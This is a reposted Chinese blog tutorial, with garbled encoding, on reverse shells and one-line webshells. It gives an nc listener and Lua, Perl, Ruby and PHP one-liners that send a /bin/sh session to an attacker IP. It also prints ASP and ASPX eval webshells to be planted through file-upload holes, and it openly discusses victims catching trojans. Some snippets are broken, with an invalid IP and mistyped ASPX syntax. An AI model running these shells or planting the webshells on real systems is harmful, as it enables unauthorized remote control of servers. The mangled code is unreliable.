渗透测试小马(一句话)篇
滲透測試首先要搞定虛擬機和環(huán)境問題,虛擬機就不在贅述,網(wǎng)上很多,我也寫過,此處以反彈shell為例。
一、什么是反彈shell?
反彈shell (reverse shell),就是控制端監(jiān)聽在某TCP/UDP端口,被控端發(fā)起請求到該端口,并將其命令行的輸入輸出轉到控制端。
reverse shell 與telnet, ssh 等標準 shell 對應,本質上是網(wǎng)絡概念的客戶端與服務端的角色反轉。
二、為什么要反彈shell?
為什么要反彈shell??
通常用于被控端因防火墻受限、權限不足、端口被占用等情形。
舉例:假設我們攻擊了一臺機器,打開了該機器的一個端口,攻擊者在自己的機器去連接目標機器(目標ip:目標機器端口),這是比較常規(guī)的形式,我們叫做正向連接。遠程桌面、web服務、ssh、telnet 等等都是正向連接。那么什么情況下正向連接不能用了呢??
有如下情況:
有如下情況:
- 某客戶機中了你的網(wǎng)馬,但是它在局域網(wǎng)內(nèi),你直接連接不了。
- 目標機器的ip動態(tài)改變,你不能持續(xù)控制。
- 由于防火墻等限制,對方機器只能發(fā)送請求,不能接收請求。
- 對于病毒,木馬,受害者什么時候能中招,對方的網(wǎng)絡環(huán)境是什么樣的,什么時候開關機等情況都是未知的,所以建立一個服務端讓惡意程序主動連接,才是上策。
- 那么反彈就很好理解了,攻擊者指定服務端,受害者主機主動連接攻擊者的服務端程序,就叫反彈連接。
環(huán)境的查看方法是win+R,呼出指令面板,輸入cmd,打開命令提示符。
?輸入各種環(huán)境查詢,如果沒有,就像這樣。
?如果有,就像這樣
?
?然后就可以執(zhí)行各種測試
具體的實驗建議分別在一臺kali Linux 和一臺? C/Linux上做,最好用遠程監(jiān)聽工具
???????????????????????????? ???? 我推薦這款?????????????????????????????????????????????? 無網(wǎng)絡,不實驗哦
在kali Linux上監(jiān)聽端口命令:nc -lvvp 1111
(端口自己隨便改,有不沖突就行)
就像這樣
然后在C/Linux上輸入各種代碼
?lua -e "require('socket');require('os');t=socket.tcp();t:connect('192.168.227.129','1111');os.execute('/bin/sh -i <&3 >&3 2>&3');"
lua: (command line):1: module 'socket' not found:
反饋:
?perl -e '
use Socket;
$i="192.168.227.129";
$p=1111;
socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));
if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");
open(STDOUT,">&S");open(STDERR,">&S");
exec("/bin/sh -i");};'
ruby -rsocket -e 'exit if fork;c=TCPSocket.new("192.168.227.129","1111");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'
php -r '$sock=fsockopen("192.168.277.129",1111);exec("/bin/bash -i <&3 >&3 2>&3");'
諸如此類,反饋也不盡相同
?鏈接成功,這就是初步的滲透測試。
小馬通常指一句話木馬,因為其代碼量比較小,就是一句簡單的代碼。以下是幾種
腳本類型的一句話木馬:
PHP:
ASP:
<% eval request{"cmd"}%>ASPX:
<%@ Page Language="jscript"%> <%eval{Request.ltem["cmd"],"unsafe"};%>JSP和JSPX的一句話木馬比較復雜懶得寫了o(* ̄︶ ̄*)o
可利用文件上傳漏洞執(zhí)行一句話木馬進而查看IP,下載。。。等操作
總結
以上是生活随笔為你收集整理的渗透测试小马(一句话)篇的全部內(nèi)容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: 阿里云使用教程(试用一个月)
- 下一篇: ascll 和gbk,utf-8的简介